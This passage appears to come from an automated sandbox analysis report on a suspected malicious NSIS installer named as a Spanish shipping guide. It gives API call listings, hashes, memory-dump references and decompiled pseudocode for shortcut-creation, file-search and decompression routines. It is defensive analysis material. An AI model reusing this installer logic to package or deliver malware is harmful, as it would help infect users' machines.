                          • Part of subcall function 00405E29: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E81
                          • Part of subcall function 00405E29: CharNextA.USER32(?,?,?,00000000), ref: 00405E8E
                          • Part of subcall function 00405E29: CharNextA.USER32(?,"C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E93
                          • Part of subcall function 00405E29: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405EA3
                        • GetDiskFreeSpaceA.KERNEL32(00429068,?,?,0000040F,?,00429068,00429068,?,00000001,00429068,?,?,000003FB,?), ref: 00404504
                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040451F
                          • Part of subcall function 00404678: lstrlenA.KERNEL32(0042A0A0,0042A0A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404593,000000DF,00000000,00000400,?), ref: 00404716
                          • Part of subcall function 00404678: wsprintfA.USER32 ref: 0040471E
                          • Part of subcall function 00404678: SetDlgItemTextA.USER32 ref: 00404731
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                        • String ID: A$C:\Users\user\AppData\Local\Temp$TclpOwkq
                        • API String ID: 2624150263-3768769761
                        • Opcode ID: 3f80b46dd096fd368bede20d2bfb79225146288fd6115dbd0f947cd12367bd25
                        • Instruction ID: 171edb992a826102812884c43759f415235567a44aa7ca021352bae990107689
                        • Opcode Fuzzy Hash: 3f80b46dd096fd368bede20d2bfb79225146288fd6115dbd0f947cd12367bd25
                        • Instruction Fuzzy Hash: 6CA16FB1900208ABDB11AFA5DC41BAF77B8EF84315F14803BF615B62D1D77C9A418F69
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00402053, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                        Download Yara Rule
                        C-Code - Quality: 74%
                        			E00402053() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A29(0xfffffff0);
				_t96 = E00402A29(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A29(2);
				 *((intOrPtr*)(_t100 - 0xc)) = E00402A29(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x38)) = E00402A29(0x45);
				if(E00405727(_t96) == 0) {
					E00402A29(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407504, _t75, 1, 0x4074f4, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407514, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\alfons\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x18);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x18);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0xc)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0xc)),  *(_t100 - 0x18) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x34)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x38)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409438, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 8));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409438, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                        0x0040205c
                        0x00402066
                        0x0040206f
                        0x00402079
                        0x00402082
                        0x0040208c
                        0x00402090
                        0x00402090
                        0x00402095
                        0x004020a6
                        0x004020ae
                        0x0040218e
                        0x0040218e
                        0x00402195
                        0x004020b4
                        0x004020b4
                        0x004020c5
                        0x004020c9
                        0x004020cf
                        0x004020d9
                        0x004020db
                        0x004020e6
                        0x004020e9
                        0x004020f6
                        0x004020f8
                        0x004020fa
                        0x00402101
                        0x00402104
                        0x00402104
                        0x00402107
                        0x00402111
                        0x00402119
                        0x0040211e
                        0x0040212a
                        0x0040212a
                        0x0040212d
                        0x00402136
                        0x00402139
                        0x00402142
                        0x00402147
                        0x00402159
                        0x00402168
                        0x0040216a
                        0x00402176
                        0x00402176
                        0x00402168
                        0x00402178
                        0x0040217e
                        0x0040217e
                        0x00402181
                        0x00402187
                        0x0040218c
                        0x004021a1
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040218c
                        0x00402197
                        0x004028c1
                        0x004028cd

                        APIs
                        • CoCreateInstance.OLE32(00407504,?,00000001,004074F4,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020A6
                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409438,00000400,?,00000001,004074F4,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402160
                        Strings
                        • C:\Users\user\AppData\Local\Temp, xrefs: 004020DE
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: ByteCharCreateInstanceMultiWide
                        • String ID: C:\Users\user\AppData\Local\Temp
                        • API String ID: 123533781-1943935188
                        • Opcode ID: 0f4e10af4ab318a31e6fcfc6a713dc1191477b15d05add315443f5ab89249dcc
                        • Instruction ID: 8f67ba42191d57eba63015a6e8d0bffc44353c0eb35145c2afa1481ff4163fd5
                        • Opcode Fuzzy Hash: 0f4e10af4ab318a31e6fcfc6a713dc1191477b15d05add315443f5ab89249dcc
                        • Instruction Fuzzy Hash: 2D414C75A00205BFCB00DFA8CD89E9E7BB6EF49354F204169FA05EB2D1CA799C41CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00402671, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 39%
                        			E00402671(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A29(2), _t19 - 0x19c) != 0xffffffff) {
					E00405B25(__edi, _t6);
					_push(_t19 - 0x170);
					_push(__esi);
					E00405BC7();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                        0x00402689
                        0x0040269d
                        0x004026a8
                        0x004026a9
                        0x004027e4
                        0x0040268b
                        0x0040268b
                        0x0040268d
                        0x0040268f
                        0x0040268f
                        0x004028c1
                        0x004028cd

                        APIs
                        • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402680
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: FileFindFirst
                        • String ID:
                        • API String ID: 1974802433-0
                        • Opcode ID: 210d19403dc9ad4312224203accd8d1f3ff27f6c6522c4c2c719f15252d079a4
                        • Instruction ID: d100cd6159f555773fbda265320c1ac67d2490096a0530dc8ee4140695772295
                        • Opcode Fuzzy Hash: 210d19403dc9ad4312224203accd8d1f3ff27f6c6522c4c2c719f15252d079a4
                        • Instruction Fuzzy Hash: 24F0A0326081049ED711EBA99A499EEB778DB11328F6045BFE101B61C1C7B859459A3A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00406354, Relevance: .3, Instructions: 334COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 79%
                        			E00406354(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E00406AC3( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x4073e8; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x4073e8; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E00406B2B( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M00406A83))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x409408 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x409408 + __eax * 2) & 0x0000ffff =  *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x409408 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x409408 + __eax * 2) & 0x0000ffff =  *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x42dbb8;
												if( *0x42dbb8 != 0) {
													L22:
													_t412 =  *0x40942c; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x409430; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x42ca34; // 0x0
													_t446[5] = _t414;
													_t415 =  *0x42ca30; // 0x0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x42ca38;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x42ceb8;
													if(_t416 < 0x42ceb8) {
														L15:
														__eflags = _t416 - 0x42cc74;
														_t438 = 8;
														if(_t416 > 0x42cc74) {
															__eflags = _t416 - 0x42ce38;
															if(_t416 >= 0x42ce38) {
																__eflags = _t416 - 0x42ce98;
																if(_t416 < 0x42ce98) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E00406B2B(0x42ca38, 0x120, 0x101, 0x4073fc, 0x40743c, 0x42ca34, 0x40942c, 0x42d338, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x42ca38, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x42ca38 + _t440;
														E00406B2B(0x42ca38, 0x1e, 0, 0x40747c, 0x4074b8, 0x42ca30, 0x409430, 0x42d338, _t448 - 8);
														 *0x42dbb8 =  *0x42dbb8 + 1;
														__eflags =  *0x42dbb8;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
